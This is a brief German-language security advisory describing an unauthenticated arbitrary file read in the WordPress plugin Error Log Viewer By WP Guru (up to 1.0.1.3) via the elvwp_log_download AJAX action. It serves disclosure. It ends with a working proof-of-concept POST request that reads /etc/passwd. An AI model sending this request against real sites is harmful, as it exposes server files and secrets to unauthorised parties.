
Error Log Viewer By WP Guru <= 1.0.1.3 - Fehlende Autorisierung für nicht authentifiziertes Lesen beliebiger Dateien
Error Log Viewer By WP Guru <= 1.0.1.3 - Fehlende Autorisierung für nicht authentifiziertes Lesen beliebiger Dateien
Das Plugin Error Log Viewer By WP Guru für WordPress ist in allen Versionen bis einschließlich 1.0.1.3 über die AJAX-Aktion wp_ajax_nopriv_elvwp_log_download anfällig für das Lesen beliebiger Dateien (Arbitrary File Read). Dies ermöglicht es nicht authentifizierten Angreifern, den Inhalt beliebiger Dateien auf dem Server zu lesen, die vertrauliche Informationen enthalten können.
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
action=elvwp_log_download&elvwp_error_log_download=1&elvwp_error_log=/etc/passwd